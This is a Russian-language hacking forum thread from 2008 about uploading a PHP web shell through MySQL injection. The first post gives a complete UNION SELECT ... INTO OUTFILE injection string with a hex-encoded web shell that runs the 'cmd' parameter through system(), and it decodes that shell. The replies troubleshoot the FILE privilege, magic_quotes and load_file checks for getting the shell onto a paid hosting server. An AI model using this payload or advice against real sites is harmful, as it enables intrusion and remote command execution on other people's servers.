 |
Помогите с заливкой шелла через mysql |
08.04.2008, 11:40
|
|
Новичок
Регистрация: 22.08.2007
Сообщений: 12
С нами:
9852905
Репутация:
1
|
|
Помогите с заливкой шелла через mysql
Хотел потренироваться в заливке шелла.
Написал бажный скрипт, сформировал запрос
test.php?id=2'+union+select+'/*','*/',0x3C3F706870206966202869737365742028245F4745545B 27636D64275D292920206563686F2073797374656D2028245F 4745545B27636D64275D293B203F3E,'/*',5,6,7,'*/'+INTO+OUTFILE+%22/home/test/public_html/shell.php%22/*
где 0x3C3F... это
<?php if (isset ($_GET['cmd'])) echo system ($_GET['cmd']); ?>
На localhost все прекрасно работает.
Заливаю на полноценный платный хостинг потестить,естественно меняю путь ... но результата нет.
Возможно это из-за отсутствия прав FILE ?
Есть ли другие способы заливки шелла,основанные на использовании MySQL Injection ?
P.S.Если разместил не в том разделе, пожалуйста перенесите. |
|
|
08.04.2008, 11:45
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
magic_quotes=on
И на хостингах file_priv у рутов только. Таким способом не зальешь
Последний раз редактировалось Basurman; 08.04.2008 в 11:56..
|
|
|
|
08.04.2008, 11:56
|
|
Новичок
Регистрация: 22.08.2007
Сообщений: 12
С нами:
9852905
Репутация:
1
|
|
Нет magic_quotes выключенны.
Подскажите,что не так.
Есть ли еще способы заливки шелла через mysql ?
|
|
|
|
08.04.2008, 14:01
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
проверь файл прив если есть доступ к mysql.user
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
08.04.2008, 14:14
|
|
Новичок
Регистрация: 22.08.2007
Сообщений: 12
С нами:
9852905
Репутация:
1
|
|
Сообщение от blackybr
проверь файл прив если есть доступ к mysql.user
К сожалению не могу проверить.
ERROR 1044 (42000): Access denied for user '*****'@'***.**.**.**' to database 'mysql'
Подозреваю, что файл прива нет :-(
Заливка шелла в mysql основана только на select into outfile ? Либо есть еще варианты ?
|
|
|
|
08.04.2008, 17:37
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Эмм... а почему в information_schema.tables не залить ? (гавно вопрос,но ладно) )))
|
|
|
|
08.04.2008, 18:04
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Велемир, что ты собрался заливать в таблицу?
|
|
|
|
08.04.2008, 18:11
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
хз )))))))))))))))))))))))))))ыыыыыы )))
|
|
|
|
08.04.2008, 19:25
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
есть несколько способов, но на все нужны fil_priv. Проверить иожно легче запросом c load_file
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
